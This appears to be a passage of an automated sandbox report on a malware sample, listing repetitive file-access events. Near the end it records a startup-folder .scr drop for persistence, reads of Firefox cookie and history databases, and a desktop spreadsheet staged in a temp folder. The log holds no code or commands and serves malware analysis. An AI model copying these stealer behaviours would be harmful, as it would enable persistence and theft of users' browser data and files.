              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI33962\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\X9g8L63QGs.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\? ?\System\Antivirus.txt VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\Desktop\AQRFEVRTGL.xlsx VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\X9g8L63QGs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\? ?\Common Files\Desktop\AQRFEVRTGL.xlsx VolumeInformationJump to behavior
